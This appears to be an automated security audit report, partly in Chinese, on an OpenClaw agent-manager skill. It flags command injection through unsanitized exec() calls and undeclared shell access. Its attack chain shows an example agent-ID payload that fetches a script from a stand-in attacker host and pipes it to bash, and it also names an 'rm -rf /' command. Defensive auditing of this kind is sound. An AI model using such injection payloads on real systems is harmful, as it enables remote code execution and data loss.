扫描报告
50 /100
colmena-manager
Skill para gestionar y coordinar agentes de OpenClaw como una colmena
Skill presents as a legitimate OpenClaw agent manager but contains multiple command-injection vulnerabilities from unsanitized user-controlled input piped into shell commands, with shell execution entirely undeclared in documentation.
谨慎使用
Do not deploy. Replace all exec() calls with parameterized APIs. Remove direct shell command construction. Add proper allowed-tools declarations. Audit agent.id and name inputs for shell metacharacters before use in any command context.
攻击链 4 步
⬡
提权 Attacker registers a malicious agent with shell metacharacters in the ID (e.g., 'vision; wget http://evil.com/sh.sh|bash')
src/index.js:12◎
入口 Victim runs 'colmena-manager health-check' to monitor the hive
src/index.js:120⬡
提权 healthCheck() calls exec() with ps aux | grep ${agent.id}, where agent.id contains un-sanitized shell metacharacters from step 1
src/index.js:131◉
影响 Shell injection executes arbitrary commands (download + execute remote script) with the permissions of the running user
src/index.js:131安全发现 6 项
| 严重性 | 安全发现 | 位置 |
|---|---|---|
| 高危 | Command injection via agentId in multiple exec() calls 代码执行 | src/index.js:66 |
| 高危 | Command injection via workspace name in rm -rf 代码执行 | src/index.js:193 |
| 高危 | Shell execution completely absent from SKILL.md 文档欺骗 | SKILL.md:55 |
| 中危 | Referenced HEARTBEAT.md does not exist 文档欺骗 | SKILL.md:64 |
| 中危 | No allowed-tools declaration despite full shell/filesystem access 权限提升 | claws.json:1 |
| 低危 | Hardcoded /home/nvi/ path creates dependency on specific user account 敏感访问 | src/index.js:66 |
| 资源类型 | 声明权限 | 推断权限 | 状态 | 证据 |
|---|---|---|---|---|
| 命令执行 | NONE | WRITE | ✗ 越权 | src/index.js:66 exec with tail | src/index.js:131 exec with ps|grep | src/index.… |
| 文件系统 | NONE | WRITE | ✗ 越权 | src/index.js:188 mkdir via exec | src/index.js:193 rm -rf via exec |
| 技能调用 | NONE | READ | ✓ 一致 | src/index.js:13 agents_list, sessions_list, sessions_send — matches SKILL.md API… |
1 严重 3 项发现
严重 危险命令 危险 Shell 命令
rm -rf / src/index.js:193 中危 外部 URL 外部 URL
https://clawhub.com/colmena-manager claws.json:15 提示 邮箱 邮箱地址
[email protected] claws.json:18 目录结构
5 文件 · 14.1 KB · 552 行 JavaScript 1f · 289L
Markdown 2f · 211L
JSON 2f · 52L
├─
▾
src
│ └─
index.js
JavaScript
├─
claws.json
JSON
├─
package.json
JSON
├─
README.md
Markdown
└─
SKILL.md
Markdown
依赖分析 1 项
| 包名 | 版本 | 来源 | 已知漏洞 | 备注 |
|---|---|---|---|---|
openclaw | >=1.0.0 | npm (peer dep) | 否 | Peer dependency, not bundled. No known vulnerabilities. |
安全亮点
✓ Skill implements its stated functionality (agent management) without additional hidden data exfiltration
✓ No base64-encoded payloads or obfuscated code blocks found
✓ No credential harvesting from ~/.ssh, ~/.aws, or .env files
✓ No network requests to external IPs detected
✓ No reverse shell, C2, or data theft mechanisms present
✓ No cron/scheduled task persistence mechanisms found
✓ No malicious dependencies detected; package.json has minimal legitimate dependencies